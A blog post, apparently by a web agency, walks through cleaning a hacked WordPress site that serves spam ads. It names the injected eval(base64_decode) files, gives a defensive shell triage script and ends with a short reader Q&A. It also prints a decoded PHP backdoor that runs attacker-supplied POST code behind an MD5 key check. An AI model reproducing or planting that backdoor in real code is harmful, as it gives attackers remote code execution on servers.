How to fix a hack on your website
WordPress hack: "viagra ads are taking over my website"
WordPress is one of the most widely used CMSs and, for that very reason, one of the most frequently attacked by crackers. But a WordPress hack is sometimes neither easy to detect nor easy to fix.
It seems that last weekend many sites built with this CMS were attacked. On Monday we received a query from one of the sites affected by the attack. In this case, code (viagra ads) had been injected into the site's header, footer and news section, but although the owners had searched the templates for those texts, they had not found them, so they asked us to fix it.
Files affected by the hack
Reviewing the files and searching through them (using the GNU/Linux find command), we found two files with "suspicious" content:
- wp-includes/functions.php (WordPress core functions file)
<?php eval(base64_decode('JF9GPV9fRklMRV9fOyRfWD0n...ENCODED-CODE...09JykpOw==')); /* the file continues */
- wp-content/plugins/wordpress-seo/inc/admin.php (file inside the WordPress SEO by Yoast plugin)
<?php eval(base64_decode('aWYoQG1kNSgkX...ENCODED-CODE...GllOyB9Cg==')); ?>
The functions.php file contains the functions WordPress itself uses; changing the file changes WordPress's default behaviour. The client told us that even when they switched themes from the back end, the site always displayed the customised theme, so it is clear that core functions had been overwritten.
The site also had version 1.4.7 of the WordPress SEO by Yoast plugin installed. After downloading that version and reviewing it, we saw that its inc directory contains only the files class-rewrite.php, class-sitemaps.php, wpseo-functions.php and wpseo-non-ajax-functions.php, which confirmed that admin.php should not exist at all.
Once these calls were removed, the site looked as it did before. To close out the review, all that remains is to change the site administrator's password, the database password and the cookie generation salts (wp-config.php).
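The triage steps above as a POSIX shell script, added here as an example and not the article's own code: the find-based search for eval(base64_decode(...)) droppers, the comparison of the installed plugin directory against a clean download, and fresh salts for wp-config.php. It builds a constructed, harmless sample tree so it runs offline; the sample file names, the grep pattern and the helper names are assumptions, not taken from the article.

```shell
#!/bin/sh
# Added example (not the article's code). Triage helpers for a hacked
# WordPress install, mirroring the steps described above:
#   1. find_eval_injections  -- the find-based search for eval(base64_decode(...))
#   2. list_unexpected_files -- compare the installed plugin against a clean copy
#   3. print_new_salts       -- fresh cookie keys and salts for wp-config.php
# make_sample_site builds a constructed, harmless tree so the script runs offline;
# its file names imitate the article's wordpress-seo/inc layout.

# Print each *.php file under $1 containing an eval() fed by a decoder or by
# stripslashes(), the two shapes seen in the injected files. grep -l prints
# names only, -I skips binary files, -E enables the alternation.
find_eval_injections() {
    find "$1" -type f -name '*.php' -exec grep -lIE \
        'eval[[:space:]]*\([[:space:]]*@?(base64_decode|gzinflate|str_rot13|stripslashes)' {} +
}

# Print files (relative paths) present in the installed tree $1 but absent from
# the clean tree $2. Both trees must be the same plugin version for the
# comparison to mean anything.
list_unexpected_files() {
    inst_list=$(mktemp); clean_list=$(mktemp)
    ( cd "$1" && find . -type f | sort ) > "$inst_list"
    ( cd "$2" && find . -type f | sort ) > "$clean_list"
    comm -23 "$inst_list" "$clean_list"   # lines only in the first file
    rm -f "$inst_list" "$clean_list"
}

# Emit replacement define() lines for the eight WordPress keys and salts.
# Rotating them invalidates every existing login cookie, including any the
# attacker may still hold.
print_new_salts() {
    for name in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
                AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
        secret=$(head -c 48 /dev/urandom | base64 | tr -d '\n')
        printf "define('%s', '%s');\n" "$name" "$secret"
    done
}

# Build a constructed sample: an "installed" plugin copy with one legitimate
# file and one injected admin.php, and a "clean" copy with only the legitimate
# file. The base64 in the dropper is harmless; it decodes to "echo 1;".
make_sample_site() {
    root=$(mktemp -d)
    mkdir -p "$root/installed/inc" "$root/clean/inc"
    printf '<?php\nfunction wpseo_sample() { return 1; }\n' \
        > "$root/clean/inc/wpseo-functions.php"
    cp "$root/clean/inc/wpseo-functions.php" "$root/installed/inc/wpseo-functions.php"
    printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n' > "$root/installed/inc/admin.php"
    printf '%s\n' "$root"
}

# Stand-alone run (sh triage.sh --demo): build the sample, report, clean up.
if [ "${1:-}" = "--demo" ]; then
    site=$(make_sample_site)
    echo "== eval() droppers under installed/:"; find_eval_injections "$site/installed"
    echo "== files not in the clean copy:";      list_unexpected_files "$site/installed" "$site/clean"
    echo "== new salts for wp-config.php:";      print_new_salts
    rm -rf "$site"
fi
```

On a real site, point find_eval_injections at the WordPress root and list_unexpected_files at the installed plugin directory and an unpacked download of the same plugin version.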
If you are interested in seeing what code was actually injected (already decoded), you can see it below:
The decoded line from wp-includes/functions.php is:
The decoded line from wp-content/plugins/wordpress-seo/inc/admin.php is:
if(@md5($_POST['key']) == '9e13c0...MD5...b2b6'){ $cmd = $_POST['code']; @eval(@stripslashes($cmd)); die; } // backdoor: when the MD5 of POST 'key' matches, POST 'code' is executed as PHP
Hi, so should I just replace those files with fresh ones downloaded from WP? Or should I simply delete them?
Hi Mireya,
you can overwrite the files with the originals (remember they must be the same version, or carry whatever modifications your copies had). The other option, which would be better (since you probably don't have the originals), is to delete or comment out the lines that were injected into them.
Remember that after fixing this, you have to find the hole they got in through and close it.
Regards